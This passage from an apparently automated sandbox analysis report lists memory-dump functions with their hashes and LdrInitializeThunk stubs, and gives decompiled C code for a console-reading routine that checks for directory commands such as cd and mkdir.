Opcode ID: c07f2d296528aab310bf4a07112cf8e801c4f27be98866de7ee5c5ce934513df
Instruction ID: 59da4f08925891962fcb0a3419a6e8e7b2fd80412fbbb28456060a5003ce63e4
Opcode Fuzzy Hash: c07f2d296528aab310bf4a07112cf8e801c4f27be98866de7ee5c5ce934513df
Instruction Fuzzy Hash: A290026D22306406D180B159544861A000597D1282F91D425A400555CCCA5588696361

Uniqueness

Uniqueness Score: -1.00%

Function 033D9FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D9FEA

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: 0dd9f89a150a5b2e67ae8fb8c0792a067d257418039b4d02323691df5f668bdb
Instruction ID: 32a1e4e121b4ceddc9b795abb6616bb49f4badafbecf63de7293ca02d16b5e47
Opcode Fuzzy Hash: 0dd9f89a150a5b2e67ae8fb8c0792a067d257418039b4d02323691df5f668bdb
Instruction Fuzzy Hash: BA9002753211A806D110A1598444716000597D1281F51C421A481455CD87D588917162

Uniqueness

Uniqueness Score: -1.00%

Function 033D9A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D9A5A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: 13dd2c669eb94bf5d1fa9edef53c2599a44bb50123e3242cb470452355670361
Instruction ID: 08776371a47e6fed3e923fbc0e5348bbf55c6b1e28adb802b034c0be28dfea2d
Opcode Fuzzy Hash: 13dd2c669eb94bf5d1fa9edef53c2599a44bb50123e3242cb470452355670361
Instruction Fuzzy Hash: CE90026522186446D200A5694C54B17000597D0383F51C125A4144558CCA5588616561

Uniqueness

Uniqueness Score: -1.00%

Function 033D96E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 033D96EA

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 9daf0bf70a57540094f49ca4e0dc877206238f0f8e2ae8ed1c23262000783d9b
Instruction ID: ce2964d41e089d6dd3aec609fcee4e73e260a52e67e26374bc7827eaae489ffc
Opcode Fuzzy Hash: 9daf0bf70a57540094f49ca4e0dc877206238f0f8e2ae8ed1c23262000783d9b
Instruction Fuzzy Hash: 9B9002752110EC06D110A159844475A000597D0381F55C421A841465CD87D588917161

Uniqueness

Uniqueness Score: -1.00%

Function 033D96D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D96DA

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: 95c1041ad82288cab72724c3567c16b38a1dce6c0262fabc04a2e57098cd14f1
Instruction ID: bbf9c2b624f6769eaac2495cfdd913c61e243f09e5c1fd1c5b53ffeaeaee61cb
Opcode Fuzzy Hash: 95c1041ad82288cab72724c3567c16b38a1dce6c0262fabc04a2e57098cd14f1
Instruction Fuzzy Hash: 9490027521106C46D100A1594444B56000597E0381F51C026A4114658D8755C8517561

Uniqueness

Uniqueness Score: -1.00%

Function 033D9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D991A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: 1023c092beefc79fa05483300cff197566bc01a85b2d5db3dd0fb2e3d6af80d4
Instruction ID: eb91107ce7b0d18c11bc6b0188335438f6021b073097ccf01b5ac94f843b69d6
Opcode Fuzzy Hash: 1023c092beefc79fa05483300cff197566bc01a85b2d5db3dd0fb2e3d6af80d4
Instruction Fuzzy Hash: A09002B521106806D140B1594444756000597D0381F51C021A9054558E87998DD576A5

Uniqueness

Uniqueness Score: -1.00%

Function 033D9540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D954A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: 43e957df5c98c1023fc0581ec3865c18366a3d23b01d7e3e91e766c09ca44345
Instruction ID: 2a9b3773a1ea4de739c556502b21dd549db6ab4eb826d5aa2efdbfd2df0d6669
Opcode Fuzzy Hash: 43e957df5c98c1023fc0581ec3865c18366a3d23b01d7e3e91e766c09ca44345
Instruction Fuzzy Hash: BE90047D331074070105F55D07445170047D7D53D1351C031F5005554CD771CC717171

Uniqueness

Uniqueness Score: -1.00%

Function 033D99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 033D99AA

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 315e15da02fc6c8a07fddc15484787442b94e7046b079d351fd36c6e5e517641
Instruction ID: 9e1a586e8eb2ec78973ec96332538d31c52790ab13886e03edfe664115c8cc7c
Opcode Fuzzy Hash: 315e15da02fc6c8a07fddc15484787442b94e7046b079d351fd36c6e5e517641
Instruction Fuzzy Hash: 3F9002A535106846D100A1594454B160005D7E1381F51C025E5054558D8759CC527166

Uniqueness

Uniqueness Score: -1.00%

Function 033D95D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D95DA

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: 8d38a509b78ec3747d6e4b0af3eb03a4fef17363d17e39818a28193742693b94
Instruction ID: 02a7705d759b31ad358de4dd842664bc2b50f90ccda1397404c7843a8f340a00
Opcode Fuzzy Hash: 8d38a509b78ec3747d6e4b0af3eb03a4fef17363d17e39818a28193742693b94
Instruction Fuzzy Hash: D49002A5212064074105B1594454626400A97E0281B51C031E5004594DC66588917165

Uniqueness

Uniqueness Score: -1.00%

Function 033D9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D986A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: cac2acbcf68c674a94d1b5463be9b6f8e958222cba2a3172c801c5f1073fbd36
Instruction ID: 9ad3c950440adb13547a82d84b1d048497c48ee47c1f5028a248a4753a8e931d
Opcode Fuzzy Hash: cac2acbcf68c674a94d1b5463be9b6f8e958222cba2a3172c801c5f1073fbd36
Instruction Fuzzy Hash: E790027521106817D111A1594544717000997D02C1F91C422A441455CD97968952B161

Uniqueness

Uniqueness Score: -1.00%

Function 033D9840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D984A

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: 73e0db90b81b18a49649ebd81370f2353c7f398743aef852beca2dd446fd654d
Instruction ID: 5432b200a6408ac614c273eb82ca540f911fcc00ab9e8f3ae38da87c7f4e3fb9
Opcode Fuzzy Hash: 73e0db90b81b18a49649ebd81370f2353c7f398743aef852beca2dd446fd654d
Instruction Fuzzy Hash: BC9002652520A5565545F15944445174006A7E02C1791C022A5404954C86669856E661

Uniqueness

Uniqueness Score: -1.00%

Function 033D967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.0000001A.00000002.476687065.0000000003370000.00000040.00000001. ref: 033D9694

Memory Dump Source

Source File: 0000001A.00000002.476687065.0000000003370000.00000040.00000001.sdmp, Offset: 03370000, based on PE: true

Associated: 0000001A.00000002.478748328.000000000348B000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.478791724.000000000348F000.00000040.00000001.sdmp Download File

Similarity

API ID: A.00000002.476687065.0000000003370000.00000040.00000001InitializeThunk.0000001
String ID:
API String ID: 3270353070-0
Opcode ID: c1e453a819787253b4ddda2d864411d41251750acc7f48c25cdc101d4719f916
Instruction ID: edf61d55e01b5693cec6510ee2198bce5f6291c9cd626c9c2ce0f233e24049d7
Opcode Fuzzy Hash: c1e453a819787253b4ddda2d864411d41251750acc7f48c25cdc101d4719f916
Instruction Fuzzy Hash: BDB09B729014D5C9D611D7705A48727790477D0751F16C0A1D1020645A4778C491F6B5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00353506, Relevance: 65.1, APIs: 30, Strings: 7, Instructions: 353
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 48%

			E00353506(void __ecx, signed int __edx, long _a4, DWORD* _a8) {
				signed int _v8;
				signed int _v16;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				unsigned int _v36;
				intOrPtr _v40;
				unsigned int _v44;
				intOrPtr _v50;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v56;
				signed int _v68;
				void* _v76;
				void* _v80;
				DWORD* _v84;
				long _v88;
				void* _v90;
				signed int _v92;
				int _v96;
				void* _v100;
				long _v108;
				signed int _v112;
				void* _v120;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t83;
				void* _t85;
				int _t86;
				int _t87;
				int _t93;
				signed int _t95;
				void* _t99;
				void* _t104;
				void* _t105;
				void _t106;
				void _t107;
				signed int _t108;
				void* _t118;
				void _t119;
				signed int _t133;
				signed int _t134;
				void* _t141;
				void* _t142;
				long _t143;
				void* _t147;
				signed char _t149;
				signed int _t152;
				void* _t156;
				signed int _t157;
				void* _t159;
				void* _t163;
				void* _t168;
				void* _t169;
				int _t170;
				void* _t177;
				void* _t178;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t185;
				DWORD* _t187;
				void* _t189;
				struct _COORD _t190;
				signed int _t191;
				signed int _t193;
				void* _t196;
				void* _t197;
				void* _t206;
				void* _t207;

				_t173 = __edx;
				_t193 = (_t191 & 0xfffffff8) - 0x54;
				_t83 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t83 ^ _t193;
				_t187 = _a8;
				_t184 = __edx;
				_v56.dwCursorPosition = __ecx;
				_v80 = _t187;
				_t85 = GetStdHandle(0xfffffff5);
				_v76 = _t85;
				if(_t85 == 0xffffffff) {
					__imp___get_osfhandle(1);
					_v76 = _t85;
				}
				if( *0x373cc9 == 0) {
					L66:
					__imp__AcquireSRWLockShared(0x377f20);
					_t86 = ReadConsoleW(_v56.dwSize, _t184, _a4, _t187, 0);
					__imp__ReleaseSRWLockShared(0x377f20);
					_t87 = _t86;
				} else {
					_t147 = 0x20;
					_t196 =  *0x35d0d8 - _t147; // 0x20
					if(_t196 >= 0) {
						goto L66;
					} else {
						_t197 =  *0x35d0d4 - _t147; // 0x20
						if(_t197 >= 0 || GetConsoleScreenBufferInfo(_t85,  &_v32) == 0) {
							goto L66;
						} else {
							_t149 =  *0x35d0d8; // 0x20
							_t190 = _v32.dwCursorPosition;
							_t142 = 0;
							_t173 = 1 << _t149;
							asm("bts edx, eax");
							_v68 = _t190;
							_v56.wAttributes = 0x10;
							_v56.dwSize = 0;
							_v44 = 0;
							_v40 = 1;
							_v36 = 0;
							E0035B4DD( *0x35d0d4 & 0x0000ffff);
							 *0x35d580 = 0;
							 *0x35d578 = 0;
							 *0x35d574 = 0;
							 *0x35d57c = 0;
							while(1) {
								L7:
								__imp__AcquireSRWLockShared(0x377f20);
								_t93 = ReadConsoleW(_v56.dwSize, _t184, _a4, _v84,  &(_v56.dwCursorPosition));
								_v92 = _t93;
								__imp__ReleaseSRWLockShared(0x377f20);
								_v68 =  *_v88;
								if( *0x35d544 == 0) {
									_t95 = 0;
									__eflags = 0;
								} else {
									EnterCriticalSection( *0x363858);
									 *0x35d544 = 0;
									LeaveCriticalSection( *0x363858);
									if(_t142 != 0) {
										RtlFreeHeap(GetProcessHeap(), 0, _t142);
									}
									_t95 = 0;
									_t142 = 0;
								}
								if(_v96 == 0) {
									break;
								}
								_t173 = _t173 | 0xffffffff;
								_v92 = _v92 | 0xffffffff;
								_v80 = _t95;
								if( *_v88 <= 0) {
									break;
								} else {
									while(1) {
										_t152 =  *(_t184 + _t95 * 2) & 0x0000ffff;
										if(_t152 == 0xd) {
											break;
										}
										_t206 = _t152 -  *0x35d0d8; // 0x20
										if(_t206 == 0) {
											_v92 = _t95;
											goto L25;
										} else {
											_t207 = _t152 -  *0x35d0d4; // 0x20
											if(_t207 == 0) {
												_v92 = _t95;
												_v80 = 1;
												L24:
												__eflags = _t173 - 0xffffffff;
												if(_t173 != 0xffffffff) {
													goto L18;
												} else {
													L25:
													__eflags = _t95 - 0xffffffff;
													if(_t95 == 0xffffffff) {
														goto L18;
													} else {
														 *_v88 = _t95;
														 *(_t184 + _t95 * 2) = 0;
														__eflags = _t142;
														if(_t142 == 0) {
															L35:
															_v96 = 1;
														} else {
															_t169 = _t142;
															_t133 = _t184;
															while(1) {
																_t181 =  *_t133;
																__eflags = _t181 -  *_t169;
																if(_t181 !=  *_t169) {
																	break;
																}
																__eflags = _t181;
																if(_t181 == 0) {
																	L32:
																	_t170 = 0;
																	_t134 = 0;
																} else {
																	_t182 =  *((intOrPtr*)(_t133 + 2));
																	__eflags = _t182 -  *((intOrPtr*)(_t169 + 2));
																	if(_t182 !=  *((intOrPtr*)(_t169 + 2))) {
																		break;
																	} else {
																		_t133 = _t133 + 4;
																		_t169 = _t169 + 4;
																		__eflags = _t182;
																		if(_t182 != 0) {
																			continue;
																		} else {
																			goto L32;
																		}
																	}
																}
																L34:
																_v96 = _t170;
																__eflags = _t134;
																if(_t134 != 0) {
																	goto L35;
																}
																goto L36;
															}
															asm("sbb eax, eax");
															_t134 = _t133 | 0x00000001;
															_t170 = 0;
															__eflags = 0;
															goto L34;
														}
														L36:
														_t99 = _v80;
														__eflags = _t99;
														if(__eflags == 0) {
															__eflags = _v92 - 2;
															if(__eflags > 0) {
																__imp___wcsnicmp(_t184, L"cd ", 3);
																_t193 = _t193 + 0xc;
																__eflags = _t99;
																if(__eflags == 0) {
																	L45:
																	_t99 = 1;
																} else {
																	__imp___wcsnicmp(_t184, L"rd ", 3);
																	_t193 = _t193 + 0xc;
																	__eflags = _t99;
																	if(__eflags == 0) {
																		goto L45;
																	} else {
																		__imp___wcsnicmp(_t184, L"md ", 3);
																		_t193 = _t193 + 0xc;
																		__eflags = _t99;
																		if(__eflags == 0) {
																			goto L45;
																		} else {
																			__imp___wcsnicmp(_t184, L"chdir ", 6);
																			_t193 = _t193 + 0xc;
																			__eflags = _t99;
																			if(__eflags == 0) {
																				goto L45;
																			} else {
																				__imp___wcsnicmp(_t184, L"rmdir ", 6);
																				_t193 = _t193 + 0xc;
																				__eflags = _t99;
																				if(__eflags == 0) {
																					goto L45;
																				} else {
																					__imp___wcsnicmp(_t184, L"mkdir ", 6);
																					_t193 = _t193 + 0xc;
																					__eflags = _t99;
																					if(__eflags == 0) {
																						goto L45;
																					} else {
																						__imp___wcsnicmp(_t184, L"pushd ", 6);
																						_t193 = _t193 + 0xc;
																						__eflags = _t99;
																						if(__eflags != 0) {
																							_t99 = _v80;
																						} else {
																							goto L45;
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
														_push(_v96);
														_t155 = _t184;
														_push(_t99);
														_push( !(_v44 >> 4) & 0x00000001);
														_push(_v92);
														_t104 = E0035B2BF(_t142, _t184, _a4, _t184, _t190, __eflags);
														__eflags = _t104;
														if(_t104 == 0) {
															_t105 = E00347797(_t155);
															__eflags = _t105;
															if(_t105 != 0) {
																 *0x37c014(0xffffffff);
															}
															_t156 = _t184;
															_t73 = _t156 + 2; // 0xc
															_t177 = _t73;
															do {
																_t106 =  *_t156;
																_t156 = _t156 + 2;
																__eflags = _t106 - _v80;
															} while (_t106 != _v80);
															_t157 = _t156 - _t177;
															__eflags = _t157;
															_v68 = _t157 >> 1;
														} else {
															E00359897();
															_t118 = GetConsoleScreenBufferInfo(_v100,  &_v56);
															__eflags = _t118;
															if(_t118 != 0) {
																_t168 = _v50 - (_v92 + _v108) / _v56;
																__eflags = _t168;
																_v90 = _t168;
																_t190 = _v92;
															}
															_t163 = _t184;
															_t61 = _t163 + 2; // 0xc
															_t178 = _t61;
															do {
																_t119 =  *_t163;
																_t163 = _t163 + 2;
																__eflags = _t119 - _v80;
															} while (_t119 != _v80);
															_v88 = _t163 - _t178 >> 1;
															SetConsoleCursorPosition(_v100, _t190);
															_push( &_v84);
															_push(_t190);
															_push(_v84);
															_push(0x20);
															_push(_v100);
															FillConsoleOutputCharacterW();
															WriteConsoleW(_v120, _t184, _v108,  &_v108, 0);
															_v88 = _v108;
															E003406C0(_t163 - _t178 >> 1);
														}
														__eflags = _t142;
														if(_t142 == 0) {
															_t143 = 0;
															__eflags = 0;
														} else {
															_t143 = 0;
															RtlFreeHeap(GetProcessHeap(), 0, _t142);
														}
														_t159 = _t184;
														_t76 = _t159 + 2; // 0xc
														_t173 = _t76;
														do {
															_t107 =  *_t159;
															_t159 = _t159 + 2;
															__eflags = _t107 - _t143;
														} while (_t107 != _t143);
														_t77 = (_t159 - _t173 >> 1) + 1; // 0x9
														_t108 = _t77;
														_v112 = _t108;
														_t142 = HeapAlloc(GetProcessHeap(), _t143, _t108 + _t108);
														__eflags = _t142;
														if(_t142 == 0) {
															_t87 = 0;
														} else {
															_t173 = _v112;
															E00341040(_t142, _t173, _t184);
															goto L7;
														}
													}
												}
											} else {
												_t95 = _t95 + 1;
												if(_t95 <  *_v88) {
													continue;
												} else {
													goto L18;
												}
											}
										}
										goto L67;
									}
									_t173 = _t95;
									_t95 = _v92;
									goto L24;
								}
								goto L67;
							}
							L18:
							if(_t142 != 0) {
								RtlFreeHeap(GetProcessHeap(), 0, _t142);
							}
							_t87 = _v96;
						}
					}
				}
				L67:
				_pop(_t185);
				_pop(_t189);
				_pop(_t141);
				return E00346FD0(_t87, _t141, _v16 ^ _t193, _t173, _t185, _t189);
			}

0x00353506
0x0035350e
0x00353511
0x00353518
0x0035351e
0x00353524
0x00353526
0x0035352a
0x0035352e
0x00353534
0x0035353b
0x0035353f
0x00353546
0x00353546
0x00353551
0x00353932
0x00353938
0x00353949
0x00353952
0x00353958
0x00353557
0x00353559
0x0035355a
0x00353561
0x00000000
0x00353567
0x00353567
0x0035356e
0x00000000
0x00353588
0x00353588
0x00353598
0x0035359c
0x0035359e
0x003535a0
0x003535a3
0x003535a7
0x003535af
0x003535b3
0x003535b7
0x003535bb
0x003535bf
0x003535c4
0x003535ca
0x003535d0
0x003535d6
0x003535dc
0x003535dc
0x003535e1
0x003535f8
0x00353603
0x00353607
0x0035361a
0x0035361e
0x0035365a
0x0035365a
0x00353620
0x00353626
0x00353634
0x00353639
0x00353641
0x0035364e
0x0035364e
0x00353654
0x00353656
0x00353656
0x00353661
0x00000000
0x00000000
0x00353667
0x0035366a
0x0035366f
0x00353676
0x00000000
0x00353678
0x00353678
0x00353678
0x0035367f
0x00000000
0x00000000
0x00353681
0x00353688
0x003536c8
0x00000000
0x0035368a
0x0035368a
0x00353691
0x003536ba
0x003536be
0x003536d4
0x003536d4
0x003536d7
0x00000000
0x003536d9
0x003536d9
0x003536d9
0x003536dc
0x00000000
0x003536de
0x003536e2
0x003536e6
0x003536ea
0x003536ec
0x00353729
0x00353729
0x003536ee
0x003536ee
0x003536f0
0x003536f2
0x003536f2
0x003536f5
0x003536f8
0x00000000
0x00000000
0x003536fa
0x003536fd
0x00353714
0x00353714
0x00353716
0x003536ff
0x003536ff
0x00353703
0x00353707
0x00000000
0x00353709
0x00353709
0x0035370c
0x0035370f
0x00353712
0x00000000
0x00000000
0x00000000
0x00000000
0x00353712
0x00353707
0x00353721
0x00353721
0x00353725
0x00353727
0x00000000
0x00000000
0x00000000
0x00353727
0x0035371a
0x0035371c
0x0035371f
0x0035371f
0x00000000
0x0035371f
0x00353731
0x00353731
0x00353735
0x00353737
0x0035373d
0x00353742
0x00353750
0x00353756
0x00353759
0x0035375b
0x003537db
0x003537dd
0x0035375d
0x00353765
0x0035376b
0x0035376e
0x00353770
0x00000000
0x00353772
0x0035377a
0x00353780
0x00353783
0x00353785
0x00000000
0x00353787
0x0035378f
0x00353795
0x00353798
0x0035379a
0x00000000
0x0035379c
0x003537a4
0x003537aa
0x003537ad
0x003537af
0x00000000
0x003537b1
0x003537b9
0x003537bf
0x003537c2
0x003537c4
0x00000000
0x003537c6
0x003537ce
0x003537d4
0x003537d7
0x003537d9
0x003537e0
0x00000000
0x00000000
0x00000000
0x003537d9
0x003537c4
0x003537af
0x0035379a
0x00353785
0x00353770
0x0035375b
0x00353742
0x003537e4
0x003537eb
0x003537ed
0x003537fa
0x003537fb
0x003537ff
0x00353804
0x00353806
0x003538a7
0x003538ac
0x003538ae
0x003538b2
0x003538b2
0x003538b8
0x003538ba
0x003538ba
0x003538bd
0x003538bd
0x003538c0
0x003538c3
0x003538c3
0x003538ca
0x003538ca
0x003538ce
0x0035380c
0x0035380c
0x0035381a
0x00353820
0x00353822
0x0035383b
0x0035383b
0x0035383d
0x00353842
0x00353842
0x00353846
0x00353848
0x00353848
0x0035384b
0x0035384b
0x0035384e
0x00353851
0x00353851
0x00353861
0x00353865
0x0035386f
0x00353870
0x00353871
0x00353875
0x00353877
0x0035387b
0x00353892
0x0035389c
0x003538a0
0x003538a0
0x003538d2
0x003538d4
0x003538e9
0x003538e9
0x003538d6
0x003538d7
0x003538e1
0x003538e1
0x003538eb
0x003538ed
0x003538ed
0x003538f0
0x003538f0
0x003538f3
0x003538f6
0x003538f6
0x003538ff
0x003538ff
0x00353902
0x00353917
0x00353919
0x0035391b
0x0035392e
0x0035391d
0x0035391d
0x00353924
0x00000000
0x00353924
0x0035391b
0x003536dc
0x00353693
0x00353697
0x0035369a
0x00000000
0x00000000
0x00000000
0x00000000
0x0035369a
0x00353691
0x00000000
0x00353688
0x003536ce
0x003536d0
0x00000000
0x003536d0
0x00000000
0x00353676
0x0035369c
0x0035369e
0x003536ab
0x003536ab
0x003536b1
0x003536b1
0x0035356e
0x00353561
0x0035395a
0x0035395e
0x0035395f
0x00353960
0x0035396b

APIs

GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,0000000A,00000000,00000001), ref: 0035352E
_get_osfhandle.MSVCRT ref: 0035353F
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 0035357A
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 003535E1
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000010), ref: 003535F8
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00353607
EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00353626
LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00353639
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00353647
RtlFreeHeap.NTDLL(00000000), ref: 0035364E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 003536A4
RtlFreeHeap.NTDLL(00000000), ref: 003536AB
_wcsnicmp.MSVCRT ref: 00353750
_wcsnicmp.MSVCRT ref: 00353765
_wcsnicmp.MSVCRT ref: 0035377A
_wcsnicmp.MSVCRT ref: 0035378F
_wcsnicmp.MSVCRT ref: 003537A4
_wcsnicmp.MSVCRT ref: 003537B9
_wcsnicmp.MSVCRT ref: 003537CE
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 0035381A
SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 00353865
FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 0035387B
WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 00353892
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 003538DA
RtlFreeHeap.NTDLL(00000000), ref: 003538E1
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000009,?,?,?,00000001), ref: 0035390A
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00353911
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00353938
ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,0000000A,?,?,00000000), ref: 00353949
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00377F20), ref: 00353952

Strings

cd , xrefs: 0035374A
chdir , xrefs: 00353789
pushd , xrefs: 003537C8
md , xrefs: 00353774
rmdir , xrefs: 0035379E
mkdir , xrefs: 003537B3
rd , xrefs: 0035375F

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
API String ID: 2991647268-3100821235
Opcode ID: 5f6d5424a45becbda8144d005472f4a60fa763457cb0bcfcac79fb8d52f5f7fa
Instruction ID: e4d267906e75bd6054c653b0c2f88a89ea9c895729d3dad4ea4397377e3f64e4
Opcode Fuzzy Hash: 5f6d5424a45becbda8144d005472f4a60fa763457cb0bcfcac79fb8d52f5f7fa
Instruction Fuzzy Hash: 5FC1B4B1604301AFD7229F24DC84E6A77E9FF88352F054A1DF94AC62B0D771CA49CB12

Uniqueness

Uniqueness Score: -1.00%

Function 00343F80, Relevance: 47.6, APIs: 15, Strings: 12, Instructions: 395
COMMON

